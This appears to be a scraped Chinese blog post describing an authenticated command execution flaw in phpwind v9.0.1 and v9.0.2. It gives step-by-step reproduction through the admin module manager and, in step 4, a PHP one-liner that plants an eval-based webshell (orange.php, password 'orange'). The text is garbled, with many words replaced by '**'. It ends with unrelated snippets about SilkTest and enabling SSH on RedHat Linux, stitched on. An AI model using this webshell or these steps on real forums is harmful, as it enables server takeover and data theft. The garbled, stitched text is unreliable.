phpwind v9存在命令執行漏洞(登陸後台)

2022-07-18 12:51:11 字數 2130 閱讀 6716

已知漏洞:

phpwind v9最新版存在命令執行漏洞(登陸後台)

phpwind_v9.0.2(最新版

),phpwind_v9.0.1

命令執行

高危(getshell)

phpwind是乙個基於php和mysql的開源社群程式,是國內最受歡迎的通用型論壇程式之一。社群可提供豐富的應用,滿足人們獲取資訊、交流、娛樂、消費等生活需求。phpwind_v9.0.2(最新版

),phpwind_v9.0.1

版本登陸後台,呼叫**,存在命令執行漏洞,進而

getshell

。攻擊者可獲取**社群的資料庫資訊,可發布資訊等。

漏洞驗證

版本phpwind_v9.0.2,登陸後台,門戶

-->

模組管理

-->

呼叫管理

-->

新增模組,新增模組

-->

選擇自定義

html

,下一步,寫入

<?php phpinfo(); ?> ,

然後呼叫**。

選擇呼叫站外**xml,複製連線,訪問,呼叫

xml,

json

都可以。去掉

xml,會執行

phpinfo();

\apicontroller.php,具體**位置如下圖所示

預設安裝,需要登陸後台

1,本地搭建的環境

phpwind_v9.0.2

: 密碼: qrgg

)。實驗用的是

phpwind_v9.0.2

環境,phpwind_v9.0.1

的方法是一樣的

(:

密碼: ydj3)

.htaccess

刪除。2,本地進行實驗,預設安裝,登陸後台(admin.php)(

),門戶

-->

模組管理

-->

呼叫管理

-->

新增模組,新增模組

-->

選擇自定義

html

,下一步,寫入

<?php phpinfo(); ?> ,

然後呼叫**。

3,選擇呼叫站外代,複製連線,訪問,呼叫

xml,

json

都可以。以

xml為例(

去掉xml,會執行

4,將**換成(

<?php fputs(fopen("orange.php","w"),"<?eval(\$_post[orange]);?>");?>

)新建乙個orange.php檔案,將一句話寫入

orange.php

檔案。(

5,(密碼

orange

SilkTest高階高階系列9 非同步執行命令

我們常常會使用sys execute函式執行一些外部的程式或者命令來做一些事情,但是由於sys execute是乙個同步的函式,它會等待執行的命令完成後才會返回。在大多數情況下,這個函式足夠用了。但是在一些特殊的情況下,測試工程師可能期望在執行某個命令的過程中檢查軟體的狀態,以便判斷軟體是否工作正常...

RedHat 9 Linux開啟SSH服務命令

redhat 9 linux開啟ssh服務命令 啟動 service sshd start 安裝過程 1.以root身份登入系統 沒登入系統和沒有足夠的許可權都不能安裝,暈,這不是廢話 2.檢查安裝系統時是否已經安裝ssh服務端軟體包 rpm qa grep openssh 若顯示結果中包含open...

RedHat 9 Linux開啟SSH服務命令

啟動 service sshd start 安裝過程 1.以root身份登入系統 沒登入系統和沒有足夠的許可權都不能安裝,暈,這不是廢話 2.檢查安裝系統時是否已經安裝ssh服務端軟體包 rpm qa grep openssh 若顯示結果中包含openssh server 則說明已經安裝,直接啟動 ...